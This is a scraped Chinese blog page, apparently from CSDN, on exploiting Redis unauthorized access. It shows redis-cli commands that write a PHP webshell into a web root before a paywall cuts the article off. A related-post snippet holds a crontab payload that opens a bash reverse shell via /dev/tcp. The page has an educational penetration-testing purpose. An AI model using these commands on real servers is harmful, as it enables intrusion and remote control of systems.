中间件框架漏洞-Readis未授权访问漏洞

最新推荐文章于 2024-08-05 10:58:58 发布
最新推荐文章于 2024-08-05 10:58:58 发布
阅读量499 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 中间件框架漏洞 redis未授权访问漏洞 文章标签: 中间件 redis 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69555575/article/details/127037999
本文探讨了Redis未授权访问的原理,当Redis服务端口开放且无密码认证时,允许任意用户进行未授权操作。文章详细介绍了三种利用这种漏洞的方法:通过Redis写入webshell,写入SSH公钥获取shell,以及利用crontab反弹shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

中间件框架漏洞-Readis未授权访问漏洞

提示:以下是本篇文章正文内容,下面案例可供参考

一、Redis未授权原理

原理:简单的理解,当redis服务(6379)端口对外开放且未做密码认证时,任意用户可未授权访问redis服务并操作获取数据。

二、三种利用redis未授予权访问漏洞

1.利用redis写webshell

1.redis-cli -h 192.168.75.131
2.config set dir /var/www/html
3.config set dbfilename redis.php
4.set x "\r\n\r\n<?php phphinfo();?>\r\n\r\n" 这样就成功写如shell

可以写入一句话木马,菜刀连接
当数据库过大时,redis写shell的小技巧:(借鉴学习的)如下

<?php 
set_time_limit(0
最低0.47元/天 解锁文章

200万优质内容无限畅学
中间件安全-jenkins未授权访问
ce666666的博客
01-23 647
0x01 前言 跟着百度一步步做,也算是认识了​ 0x02 jenkins是什么? Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。 ps:不搞java开发,了解即可。 0x03 漏洞概述 未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。默认端口为8080 0x04 漏洞复现 .
中间件安全-Elasticsearch未授权
ce666666的博客
01-23 1343
前言 掌握一下技术,学习学习 Elasticsearch是什么? 基于java开发的企业级搜索服务,提供分布式多用户的全文搜索引擎。 启动此服务默认会开放9200端口,可被非法操作数据 漏洞概述 当节点启动,会利用多播或单播寻找集群中的其他节点,并建立连接。默认开启9200端口,黑客就可以搜索信息。相当于一个API,任何人访问这个地址,就可以调用api,进行数据的增删改操作。http://x.x.x.x:9200/_nodeshttp://x.x.x.x:9200/_river 漏洞测试 下载该软件,安
常见的web中间件&java框架漏洞&总结
bobo_milk的博客
05-21 1729
对近期的web中间件漏洞进行了解。因此我对常见的web中间件漏洞进行了收集以及整理。(本篇文章将持续更新) 文章目录 一、IIS 二、Apache 三、Nginx 四、Tomcat 一、IIS IIS6.x 解析漏洞 原理:服务器默认不解析; 号及其后面的内容,相当于截断 *.asp;.jpg的文件会当成asp文件执行;/*.asp文件夹下的文件也会被当作asp脚本执行 另外,IIS6.x除了会将扩展名为....
框架中间件漏洞
niqiu320的博客
04-23 882
Struts 2漏洞简介 Apache Struts 2 最初被称为Webwork2,它是一个简洁的,可扩展的框架,可用于创建企业级java web应用程序,设计这个框架是为了从构建,部署,到应用程序维护方面来简化整个开发周期。 Struts2漏洞是一个远程命令执行漏洞和开放重定向漏洞,利用漏洞, 黑客可发起远程攻击,不但可以获取网站数据信息,甚至还可取得网站服务器控制权。而且,目前针对此漏洞的自动化工具开始出现,攻击者无需具备与漏洞相关的专业知识即可侵入服务器,直接执行命令操作,盗取数据甚至进行毁灭性操作
未授权访问:Atlassian Crowd未授权访问漏洞
qq_68163788的博客
05-17 1364
Atlassian Crowd是一套基于Web的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。 Atlassian Crowd Data Center是Crowd的集群部署版。Atlassian Crowd和Crowd Data Center在其某些发行版本中错误地启用了pdkinstall开发插件,使其存在安全漏洞。 攻击者利用该漏洞可在未授权访问的情况下对Atlassian Crowd和Crowd Data Center安装任意的恶意插件,执行任意代码/命令
红队专题-漏洞挖掘-代码审计
aming小老弟
03-11 1239
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
C++协程中间件实现:构建支持协程的高性能中间件框架
[C++协程中间件实现:构建支持协程的高性能中间件框架](https://img-blog.csdnimg.cn/20210506210912795.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0...
web渗透常见漏洞总结
gugonggugong的博客
01-14 3736
一、SQL注入 1. 原理 SQL:结构化查询语言 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 SQL注射能使攻击者绕过认证机制,完全控制远程服务器上的数据库。 当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击;如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生sql注入。 2. 不同数据库的注入 MySQL access...
【愚公系列】《AIGC辅助软件开发》011-AI辅助编写技术文档:技术文档
热门推荐
时光隧道
07-24 6万+
在当今快速发展的技术环境中,技术文档的编写变得愈加重要。无论是软件开发、产品设计,还是系统架构,清晰、准确的技术文档不仅能帮助团队成员快速理解项目,还能为用户提供必要的使用指导。然而,编写高质量的技术文档常常是一项繁琐且耗时的任务。随着人工智能技术的不断进步,AI工具的辅助作用逐渐显现,特别是在技术文档的编写过程中。借助AI,开发者和技术作家可以更高效地生成、编辑和维护文档,从而专注于更高层次的创作和思考。
Redis 未授权访问渗透之旅
weixin_45971758的博客
06-29 525
redis 的靶机的漏洞复现的前提条件:redis都是使用root用户进行运行,否则很多保存文件的操作无法实现,也就无法实现webshell 上传,修改ssh公钥,修改计划任务。所以web站点凡是使用redis中间件,都要进行基线检查加固,防止黑客利用未授权访问漏洞提权,造成主机失陷。
未授权访问漏洞总结
m0_64481831的博客
06-18 2429
以下总结了常见的未授权访问漏洞,还在持续更新中,遇到就会补充。欢迎大家关注~
内网渗透常见未授权访问
weixin_40766105的博客
01-03 5006
1.zookeeper未授权访问 开放端口:2181 ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。 它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。ZooKeeper的目标就是封装好复杂易出错的关键服务,将简单易用的接口和性能高效、功能稳定...
RabbitMQ 未授权访问漏洞
weixin_53736204的博客
08-05 2901
RabbitMQ是目前非常热门的一款消息中间件,基于AMQP协议的,可以在发布者和使用者之间交换异步消息。消息可以是人类可读的JSON,简单字符串或可以转换为JSON字符串的值列表。步骤一:使用以下Fofa语法对RabbitMQ产品进行搜索。步骤二:在打开的页面中可输入默认的账号和密码进行登陆。
Spring Boot Actuator未授权访问漏洞利用
weixin_50995890的博客
11-29 2147
这个漏洞一般是未授权导致信息泄露,更进一步危害还需要找敏感信息,比如sql、redis等账号密码,不过一般都存在这些东西
中间件安全—Tomcat常见漏洞
zzz6583zz的博客
05-08 2008
链接。
利用Weblogic中间件存在的SSRF漏洞结合redis未授权访问漏洞GetShell
wenqingshuo321的博客
10-11 935
在Search Public Registries,选择Public Registry中的 IBM,同时勾选Search by business name,开启bp进行抓包,点击search。set 1 "\n\n\n\n * * * * * root bash -i >& /dev/tcp/{本地物理机ip}/1234 0>&1\n\n\n\n"给redis服务器发送三条命令,将其写入redis的容器里里面的/etc/crontab,从而将shell反弹到本地物理机ip的1234端口。
未授权访问漏洞汇总
weixin_46137328的博客
09-23 7900
本文共11695个字,可以先收藏后看。漏洞概览: Elasticsearch未授权访问漏洞 Hadoop未授权访问漏洞 Jenkins未授权访问 MongoDB未授权访问 Zoo...
Druid未授权漏洞进一步的利用
qq_53058639的博客
05-26 2740
对于druid未授权,大多数白帽子在做测试的时候都是当作一个低危的信息泄露来处理,但是其实如果利用条件都达成了,运气够好的话,造成的危害还是不小的。这也告诉我们以后碰到这种未授权漏洞,可以多收集一些信息,扩宽一下测试思路,说不定就能获得更大的收获。
django漏洞
最新发布
03-24
不当的身份验证逻辑可能导致未授权访问敏感数据或功能。 - **解决方案**: 使用 Django 自带的认证系统 (`django.contrib.auth`) 来管理用户登录状态和权限校验。确保密码存储采用哈希算法(默认为 PBKDF2 或 Argon2...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值